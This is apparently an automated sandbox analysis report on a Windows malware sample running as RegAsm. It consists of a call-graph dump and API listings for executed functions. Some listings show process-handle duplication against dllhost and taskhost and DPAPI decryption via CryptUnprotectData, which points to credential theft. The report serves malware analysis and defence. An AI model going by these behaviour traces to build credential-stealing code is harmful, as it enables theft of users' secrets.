39778->39784 39828 4300e8 memset memset memcpy 39778->39828 39779->39781 39781->39778 39822 43819e 39781->39822 39783 4383f5 39787 438404 39783->39787 39788 43841c 39783->39788 39789 4383cd 39784->39789 39829 415c23 memcpy 39784->39829 39790 416935 16 API calls 39787->39790 39791 416935 16 API calls 39788->39791 39789->39783 39830 42453e 122 API calls 39789->39830 39790->39765 39791->39765 39792->39751 39793->39753 39794->39761 39795->39756 39797 4435be 39796->39797 39802 4436ce 39797->39802 39803 442ff8 19 API calls 39797->39803 39806 44366c 39797->39806 39809 443676 39797->39809 39820 44360c 39797->39820 39798 443737 39801 442ff8 19 API calls 39798->39801 39799 441409 memset 39804 443758 39799->39804 39800 442ff8 19 API calls 39800->39798 39801->39804 39808 4165ff 11 API calls 39802->39808 39803->39797 39804->39799 39810 443775 39804->39810 39805 4437be 39811 416760 11 API calls 39805->39811 39812 4437de 39805->39812 39807 4169a7 11 API calls 39806->39807 39807->39809 39808->39809 39809->39798 39809->39800 39809->39804 39810->39805 39816 415c56 11 API calls 39810->39816 39811->39812 39813 42463b memset memcpy 39812->39813 39815 443801 39812->39815 39813->39815 39814 443826 39818 43bd08 memset 39814->39818 39815->39814 39817 43024d memset 39815->39817 39816->39805 39817->39814 39819 443837 39818->39819 39819->39820 39821 43024d memset 39819->39821 39820->39781 39821->39819 39823 438246 39822->39823 39825 4381ba 39822->39825 39823->39778 39824 41f432 109 API calls 39824->39825 39825->39823 39825->39824 39826 41f638 103 API calls 39825->39826 39826->39825 39827->39775 39828->39784 39829->39789 39830->39783 39831->39470 39832->39486 39833->39477 39834->39481 39835->39482 39836->39486 39837->39492 39838->39501 39840 425108 39839->39840 39846 42510d 39839->39846 39883 424f74 123 API calls 39840->39883 39843 425115 39843->39497 39844 42516e 39845 415c7d 16 API calls 39844->39845 39845->39843 39846->39843 39851 42569b 39846->39851 39847->39497 39848->39497 39849->39506 39850->39505 39863 4256f1 39851->39863 39879 4259c2 39851->39879 39853 429ac1 39878 425ad6 39853->39878 39900 415c56 11 API calls 39853->39900 39857 4260dd 39895 424251 119 API calls 39857->39895 39861 422aeb memset memcpy memcpy 39861->39863 39862 429a4d 39865 429a66 39862->39865 39866 429a9b 39862->39866 39863->39853 39863->39861 39863->39862 39868 4260a1 39863->39868 39876 4259da 39863->39876 39863->39879 39882 425a38 39863->39882 39884 4227f0 memset memcpy 39863->39884 39885 422b84 15 API calls 39863->39885 39886 422b5d memset memcpy memcpy 39863->39886 39887 422640 13 API calls 39863->39887 39889 4241fc 11 API calls 39863->39889 39890 42413a 89 API calls 39863->39890 39896 415c56 11 API calls 39865->39896 39867 429a96 39866->39867 39898 416760 11 API calls 39866->39898 39899 424251 119 API calls 39867->39899 39893 415c56 11 API calls 39868->39893 39874 429a7a 39897 416760 11 API calls 39874->39897 39894 416760 11 API calls 39876->39894 39878->39844 39879->39878 39888 415c56 11 API calls 39879->39888 39882->39879 39891 422640 13 API calls 39882->39891 39892 4226e0 12 API calls 39882->39892 39883->39846 39884->39863 39885->39863 39886->39863 39887->39863 39888->39876 39889->39863 39890->39863 39891->39882 39892->39882 39893->39876 39894->39857 39895->39878 39896->39874 39897->39867 39898->39867 39899->39853 39900->39876 39901->38949 39902->38957 39912 44def7 39913 44df07 39912->39913 39914 44df00 ??3@YAXPAX 39912->39914 39915 44df17 39913->39915 39916 44df10 ??3@YAXPAX 39913->39916 39914->39913 39917 44df27 39915->39917 39918 44df20 ??3@YAXPAX 39915->39918 39916->39915 39919 44df37 39917->39919 39920 44df30 ??3@YAXPAX 39917->39920 39918->39917 39920->39919 37714 44dea5 37715 44deb5 FreeLibrary 37714->37715 37716 44dec3 37714->37716 37715->37716 39921 4148b6 FindResourceW 39922 4148cf SizeofResource 39921->39922 39925 4148f9 39921->39925 39923 4148e0 LoadResource 39922->39923 39922->39925 39924 4148ee LockResource 39923->39924 39923->39925 39924->39925 37893 415304 free 39926 441b3f 39936 43a9f6 39926->39936 39928 441b61 40109 4386af memset 39928->40109 39930 44189a 39931 4418e2 39930->39931 39933 442bd4 39930->39933 39934 4418ea 39931->39934 40110 4414a9 12 API calls 39931->40110 39933->39934 40111 441409 memset 39933->40111 39937 43aa20 39936->39937 39944 43aadf 39936->39944 39938 43aa34 memset 39937->39938 39937->39944 39939 43aa56 39938->39939 39940 43aa4d 39938->39940 40112 43a6e7 39939->40112 40120 42c02e memset 39940->40120 39944->39928 39946 43aad3 40122 4169a7 11 API calls 39946->40122 39947 43aaae 39947->39944 39947->39946 39962 43aae5 39947->39962 39948 43ac18 39951 43ac47 39948->39951 40124 42bbd5 memcpy memcpy memcpy memset memcpy 39948->40124 39952 43aca8 39951->39952 40125 438eed 16 API calls 39951->40125 39955 43acd5 39952->39955 40127 4233ae 11 API calls 39952->40127 40128 423426 11 API calls 39955->40128 39956 43ac87 40126 4233c5 16 API calls 39956->40126 39960 43ace1 40129 439811 162 API calls 39960->40129 39961 43a9f6 160 API calls 39961->39962 39962->39944 39962->39948 39962->39961 40123 439bbb 22 API calls 39962->40123 39964 43acfd 39970 43ad2c 39964->39970 40130 438eed 16 API calls 39964->40130 39966 43ad19 40131 4233c5 16 API calls 39966->40131 39967 43ad58 40132 44081d 162 API calls 39967->40132 39970->39967 39973 43add9 39970->39973 39972 43ae3a memset 39974 43ae73 39972->39974 39973->39973 40136 423426 11 API calls 39973->40136 40137 42e1c0 146 API calls 39974->40137 39975 43adab 40134 438c4e 162 API calls 39975->40134 39978 43ad6c 39978->39944 39978->39975 40133 42370b memset memcpy memset 39978->40133 39979 43adcc 40135 440f84 12 API calls 39979->40135 39980 43ae96 40138 42e1c0 146 API calls 39980->40138 39984 43aea8 39990 43aec1 39984->39990 40139 42e199 146 API calls 39984->40139 39987 43af00 39987->39944 39991 43af1a 39987->39991 39992 43b3d9 39987->39992 39989 43b60f 39989->39944 40200 4393a5 17 API calls 39989->40200 39990->39987 40140 42e1c0 146 API calls 39990->40140 40141 438eed 16 API calls 39991->40141 39996 43b3f6 39992->39996 40001 43b4c8 39992->40001 39994 43af2f 40142 4233c5 16 API calls 39994->40142 40182 432878 12 API calls 39996->40182 39998 43af51 40143 423426 11 API calls 39998->40143 40000 43b4f2 40189 43a76c 21 API calls 40000->40189 40001->40000 40188 42bbd5 memcpy memcpy memcpy memset memcpy 40001->40188 40003 43af7d 40144 423426 11 API calls 40003->40144 40007 43b529 40190 44081d 162 API calls 40007->40190 40008 43b462 40184 423330 11 API calls 40008->40184 40009 43af94 40145 423330 11 API calls 40009->40145 40013 43b47e 40018 43b497 40013->40018 40185 42374a memcpy memset memcpy memcpy memcpy 40013->40185 40014 43b544 40019 43b55c 40014->40019 40191 42c02e memset 40014->40191 40015 43b428 40015->40008 40183 432b60 16 API calls 40015->40183 40016 43afca 40146 423330 11 API calls 40016->40146 40186 4233ae 11 API calls 40018->40186 40192 43a87a 162 API calls 40019->40192 40020 43afdb 40147 4233ae 11 API calls 40020->40147 40026 43b56c 40029 43b58a 40026->40029 40193 423330 11 API calls 40026->40193 40027 43b4b1 40187 423399 11 API calls 40027->40187 40028 43afee 40148 44081d 162 API calls 40028->40148 40194 440f84 12 API calls 40029->40194 40034 43b4c1 40196 42db80 162 API calls 40034->40196 40036 43b592 40195 43a82f 16 API calls 40036->40195 40039 43b5b4 40197 438c4e 162 API calls 40039->40197 40041 43b5cf 40198 42c02e memset 40041->40198 40043 43b005 40043->39944 40047 43b01f 40043->40047 40149 42d836 162 API calls 40043->40149 40044 43b1ef 40159 4233c5 16 API calls 40044->40159 40047->40044 40157 423330 11 API calls 40047->40157 40158 42d71d 162 API calls 40047->40158 40048 43b212 40160 423330 11 API calls 40048->40160 40049 43b087 40150 4233ae 11 API calls 40049->40150 40050 43add4 40050->39989 40199 438f86 16 API calls 40050->40199 40055 43b22a 40161 42ccb5 11 API calls 40055->40161 40057 43b23f 40162 4233ae 11 API calls 40057->40162 40058 43b10f 40153 423330 11 API calls 40058->40153 40060 43b257 40163 4233ae 11 API calls 40060->40163 40064 43b129 40154 4233ae 11 API calls 40064->40154 40065 43b26e 40164 4233ae 11 API calls 40065->40164 40068 43b09a 40068->40058 40151 42cc15 19 API calls 40068->40151 40152 4233ae 11 API calls 40068->40152 40069 43b282 40165 43a87a 162 API calls 40069->40165 40071 43b13c 40155 440f84 12 API calls 40071->40155 40073 43b29d 40166 423330 11 API calls 40073->40166 40076 43b15f 40156 4233ae 11 API calls 40076->40156 40077 43b2af 40079 43b2b8 40077->40079 40080 43b2ce 40077->40080 40167 4233ae 11 API calls 40079->40167 40168 440f84 12 API calls 40080->40168 40083 43b2c9 40170 4233ae 11 API calls 40083->40170 40084 43b2da 40169 42370b memset memcpy memset 40084->40169 40087 43b2f9 40171 423330 11 API calls 40087->40171 40089 43b30b 40172 423330 11 API calls 40089->40172 40091 43b325 40173 423399 11 API calls 40091->40173 40093 43b332 40174 4233ae 11 API calls 40093->40174 40095 43b354 40175 423399 11 API calls 40095->40175 40097 43b364 40176 43a82f 16 API calls 40097->40176 40099 43b370 40177 42db80 162 API calls 40099->40177 40101 43b380 40178 438c4e 162 API calls 40101->40178 40103 43b39e 40179 423399 11 API calls 40103->40179 40105 43b3ae 40180 43a76c 21 API calls 40105->40180 40107 43b3c3 40181 423399 11 API calls 40107->40181 40109->39930 40110->39934 40111->39933 40113 43a6f5 40112->40113 40115 43a765 40112->40115 40113->40115 40201 42a115 40113->40201 40115->39944 40121 4397fd memset 40115->40121 40118 43a73d 40118->40115 40119 42a115 146 API calls 40118->40119 40119->40115 40120->39939 40121->39947 40122->39944 40123->39962 40124->39951 40125->39956 40126->39952 40127->39955 40128->39960 40129->39964 40130->39966 40131->39970 40132->39978 40133->39975 40134->39979 40135->40050 40136->39972 40137->39980 40138->39984 40139->39990 40140->39990 40141->39994 40142->39998 40143->40003 40144->40009 40145->40016 40146->40020 40147->40028 40148->40043 40149->40049 40150->40068 40151->40068 40152->40068 40153->40064 40154->40071 40155->40076 40156->40047 40157->40047 40158->40047 40159->40048 40160->40055 40161->40057 40162->40060 40163->40065 40164->40069 40165->40073 40166->40077 40167->40083 40168->40084 40169->40083 40170->40087 40171->40089 40172->40091 40173->40093 40174->40095 40175->40097 40176->40099 40177->40101 40178->40103 40179->40105 40180->40107 40181->40050 40182->40015 40183->40008 40184->40013 40185->40018 40186->40027 40187->40034 40188->40000 40189->40007 40190->40014 40191->40019 40192->40026 40193->40029 40194->40036 40195->40034 40196->40039 40197->40041 40198->40050 40199->39989 40200->39944 40202 42a175 40201->40202 40204 42a122 40201->40204 40202->40115 40207 42b13b 146 API calls 40202->40207 40204->40202 40205 42a115 146 API calls 40204->40205 40208 43a174 40204->40208 40232 42a0a8 146 API calls 40204->40232 40205->40204 40207->40118 40222 43a196 40208->40222 40223 43a19e 40208->40223 40209 43a306 40209->40222 40246 4388c4 14 API calls 40209->40246 40211 42a115 146 API calls 40211->40223 40213 415a91 memset 40213->40223 40214 43a642 40214->40222 40251 4169a7 11 API calls 40214->40251 40219 43a635 40250 42c02e memset 40219->40250 40222->40204 40223->40209 40223->40211 40223->40213 40223->40222 40233 42ff8c 40223->40233 40241 4165ff 11 API calls 40223->40241 40242 439504 13 API calls 40223->40242 40243 4312d0 146 API calls 40223->40243 40244 42be4c memcpy memcpy memcpy memset memcpy 40223->40244 40245 43a121 11 API calls 40223->40245 40225 42bf4c 14 API calls 40227 43a325 40225->40227 40226 4169a7 11 API calls 40226->40227 40227->40214 40227->40219 40227->40222 40227->40225 40227->40226 40228 42b5b5 memset memcpy 40227->40228 40247 42b63e 14 API calls 40227->40247 40248 4165ff 11 API calls 40227->40248 40249 42bfcf memcpy 40227->40249 40228->40227 40232->40204 40252 43817e 40233->40252 40235 42ff99 40236 42ffe3 40235->40236 40237 42ffd0 40235->40237 40240 42ff9d 40235->40240 40257 4169a7 11 API calls 40236->40257 40256 4169a7 11 API calls 40237->40256 40240->40223 40241->40223 40242->40223 40243->40223 40244->40223 40245->40223 40246->40227 40247->40227 40248->40227 40249->40227 40250->40214 40251->40222 40253 438187 40252->40253 40254 438192 40252->40254 40258 4380f6 40253->40258 40254->40235 40256->40240 40257->40240 40261 43811f 40258->40261 40259 438164 40259->40254 40261->40259 40263 437e5e 40261->40263 40286 4300e8 memset memset memcpy 40261->40286 40287 437d3c 40263->40287 40265 437eb3 40265->40261 40266 437ea9 40266->40265 40270 437f22 40266->40270 40302 41f432 40266->40302 40269 437f06 40313 415c56 11 API calls 40269->40313 40273 437f7f 40270->40273 40274 432d4e 3 API calls 40270->40274 40272 437f95 40314 415c56 11 API calls 40272->40314 40273->40272 40275 43802b 40273->40275 40274->40273 40315 4165ff 11 API calls 40275->40315 40278 438054 40316 437371 137 API calls 40278->40316 40281 43806b 40282 438094 40281->40282 40317 42f50e 137 API calls 40281->40317 40284 437fa3 40282->40284 40318 4300e8 memset memset memcpy 40282->40318 40284->40265 40319 41f638 103 API calls 40284->40319 40286->40261 40288 437d69 40287->40288 40292 437d80 40287->40292 40320 437ccb 11 API calls 40288->40320 40290 437d76 40290->40266 40291 437d90 40291->40290 40324 437ccb 11 API calls 40291->40324 40292->40290 40292->40291 40294 437da3 40292->40294 40295 438460 133 API calls 40294->40295 40298 437dcb 40295->40298 40296 437de8 40323 424f26 122 API calls 40296->40323 40298->40296 40321 444283 13 API calls 40298->40321 40300 437dfc 40322 437ccb 11 API calls 40300->40322 40303 41f54d 40302->40303 40309 41f44f 40302->40309 40304 41f466 40303->40304 40354 41c635 memset memset 40303->40354 40304->40269 40304->40270 40309->40304 40311 41f50b 40309->40311 40325 41f1a5 40309->40325 40350 41c06f memcmp 40309->40350 40351 41f3b1 89 API calls 40309->40351 40352 41f398 85 API calls 40309->40352 40311->40303 40311->40304 40353 41c295 85 API calls 40311->40353 40313->40265 40314->40284 40315->40278 40316->40281 40317->40282 40318->40284 40319->40265 40320->40290 40321->40300 40322->40296 40323->40290 40324->40290 40326 41bc3b 100 API calls 40325->40326 40327 41f1b4 40326->40327 40328 41edad 85 API calls 40327->40328 40334 41f282 40327->40334 40329 41f1cb 40328->40329 40330 41f1f5 memcmp 40329->40330 40331 41f20e 40329->40331 40329->40334 40330->40331 40332 41f21b memcmp 40331->40332 40331->40334 40333 41f326 40332->40333 40336 41f23d 40332->40336 40333->40334 40335 41ee6b 85 API calls 40333->40335 40334->40309 40335->40334 40336->40333 40337 41f28e memcmp 40336->40337 40339 41c8df 55 API calls 40336->40339 40337->40333 40338 41f2a9 40337->40338 40338->40333 40341 41f308 40338->40341 40342 41f2d8 40338->40342 40340 41f269 40339->40340 40340->40333 40343 41f287 40340->40343 40344 41f27a 40340->40344 40341->40333 40348 4446ce 11 API calls 40341->40348 40345 41ee6b 85 API calls 40342->40345 40343->40337 40346 41ee6b 85 API calls 40344->40346 40347 41f2e0 40345->40347 40346->40334 40349 41b1ca memset 40347->40349 40348->40333 40349->40334 40350->40309 40351->40309 40352->40309 40353->40303 40354->40304 40355 41493c EnumResourceNamesW 37718 4287c1 37719 4287d2 37718->37719 37720 429ac1 37718->37720 37722 428818 37719->37722 37723 42881f 37719->37723 37737 425711 37719->37737 37736 425ad6 37720->37736 37788 415c56 11 API calls 37720->37788 37755 42013a 37722->37755 37783 420244 96 API calls 37723->37783 37725 4260dd 37782 424251 119 API calls 37725->37782 37730 4259da 37781 416760 11 API calls 37730->37781 37734 422aeb memset memcpy memcpy 37734->37737 37735 429a4d 37739 429a66 37735->37739 37740 429a9b 37735->37740 37737->37720 37737->37730 37737->37734 37737->37735 37742 4260a1 37737->37742 37751 4259c2 37737->37751 37754 425a38 37737->37754 37771 4227f0 memset memcpy 37737->37771 37772 422b84 15 API calls 37737->37772 37773 422b5d memset memcpy memcpy 37737->37773 37774 422640 13 API calls 37737->37774 37776 4241fc 11 API calls 37737->37776 37777 42413a 89 API calls 37737->37777 37784 415c56 11 API calls 37739->37784 37741 429a96 37740->37741 37786 416760 11 API calls 37740->37786 37787 424251 119 API calls 37741->37787 37780 415c56 11 API calls 37742->37780 37748 429a7a 37785 416760 11 API calls 37748->37785 37751->37736 37775 415c56 11 API calls 37751->37775 37754->37751 37778 422640 13 API calls 37754->37778 37779 4226e0 12 API calls 37754->37779 37756 42014c 37755->37756 37759 420151 37755->37759 37798 41e466 96 API calls 37756->37798 37758 420162 37758->37737 37759->37758 37760 4201b3 37759->37760 37761 420229 37759->37761 37762 4201b8 37760->37762 37763 4201dc 37760->37763 37761->37758 37764 41fd5e 85 API calls 37761->37764 37789 41fbdb 37762->37789 37763->37758 37767 4201ff 37763->37767 37795 41fc4c 37763->37795 37764->37758 37767->37758 37769 42013a 96 API calls 37767->37769 37769->37758 37771->37737 37772->37737 37773->37737 37774->37737 37775->37730 37776->37737 37777->37737 37778->37754 37779->37754 37780->37730 37781->37725 37782->37736 37783->37737 37784->37748 37785->37741 37786->37741 37787->37720 37788->37730 37790 41fbf8 37789->37790 37793 41fbf1 37789->37793 37803 41ee26 37790->37803 37794 41fc39 37793->37794 37813 4446ce 11 API calls 37793->37813 37794->37758 37799 41fd5e 37794->37799 37796 41ee6b 85 API calls 37795->37796 37797 41fc5d 37796->37797 37797->37763 37798->37759 37801 41fd65 37799->37801 37800 41fdab 37800->37758 37801->37800 37802 41fbdb 85 API calls 37801->37802 37802->37801 37804 41ee41 37803->37804 37805 41ee32 37803->37805 37814 41edad 37804->37814 37817 4446ce 11 API calls 37805->37817 37808 41ee3c 37808->37793 37811 41ee58 37811->37808 37819 41ee6b 37811->37819 37813->37794 37823 41be52 37814->37823 37817->37808 37818 41eb85 11 API calls 37818->37811 37820 41ee70 37819->37820 37821 41ee78 37819->37821 37879 41bf99 85 API calls 37820->37879 37821->37808 37824 41be6f 37823->37824 37825 41be5f 37823->37825 37830 41be8c 37824->37830 37844 418c63 37824->37844 37858 4446ce 11 API calls 37825->37858 37827 41be69 37827->37808 37827->37818 37830->37827 37831 41bf3a 37830->37831 37832 41bed1 37830->37832 37834 41bee7 37830->37834 37861 4446ce 11 API calls 37831->37861 37835 41bef0 37832->37835 37838 41bee2 37832->37838 37834->37827 37862 41a453 85 API calls 37834->37862 37835->37834 37836 41bf01 37835->37836 37837 41bf24 memset 37836->37837 37840 41bf14 37836->37840 37859 418a6d memset memcpy memset 37836->37859 37837->37827 37848 41ac13 37838->37848 37860 41a223 memset memcpy memset 37840->37860 37843 41bf20 37843->37837 37845 418c72 37844->37845 37846 418c94 37845->37846 37847 418d51 memset memset 37845->37847 37846->37830 37847->37846 37849 41ac52 37848->37849 37850 41ac3f memset 37848->37850 37853 41ac6a 37849->37853 37863 41dc14 19 API calls 37849->37863 37851 41acd9 37850->37851 37851->37834 37854 41aca1 37853->37854 37864 41519d 37853->37864 37854->37851 37856 41acc0 memset 37854->37856 37857 41accd memcpy 37854->37857 37856->37851 37857->37851 37858->37827 37859->37840 37860->37843 37861->37834 37863->37853 37867 4175ed 37864->37867 37875 417570 SetFilePointer 37867->37875 37870 41760a ReadFile 37871 417637 37870->37871 37872 417627 GetLastError 37870->37872 37873 4151b3 37871->37873 37874 41763e memset 37871->37874 37872->37873 37873->37854 37874->37873 37876 41759c GetLastError 37875->37876 37878 4175b2 37875->37878 37877 4175a8 GetLastError 37876->37877 37876->37878 37877->37878 37878->37870 37878->37873 37879->37821 37880 417bc5 37881 417c61 37880->37881 37886 417bda 37880->37886 37882 417bf6 UnmapViewOfFile CloseHandle 37882->37882 37882->37886 37884 417c2c 37884->37886 37892 41851e 18 API calls 37884->37892 37886->37881 37886->37882 37886->37884 37887 4175b7 37886->37887 37888 4175d6 CloseHandle 37887->37888 37889 4175c8 37888->37889 37890 4175df 37888->37890 37889->37890 37891 4175ce Sleep 37889->37891 37890->37886 37891->37888 37892->37884 39903 4147f3 39906 414561 39903->39906 39905 414813 39907 41456d 39906->39907 39908 41457f GetPrivateProfileIntW 39906->39908 39911 4143f1 memset _itow WritePrivateProfileStringW 39907->39911 39908->39905 39910 41457a 39910->39905 39911->39910

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 360 40de6e-40de71 359->360 360->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 377 40dffd-40e006 372->377 373->363 373->377 375 40df08 374->375 376 40dfef-40dff2 CloseHandle 374->376 378 40df0b-40df10 375->378 376->373 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->376 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                  • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                  • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                  • API String ID: 2018390131-3398334509
                                                                                                                                                                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                  Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                  • free.MSVCRT ref: 00418803
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1355100292-0
                                                                                                                                                                                                  • Opcode ID: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                                                                                                                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                  Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51encryptionCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1945712969-0
                                                                                                                                                                                                  • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                  Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
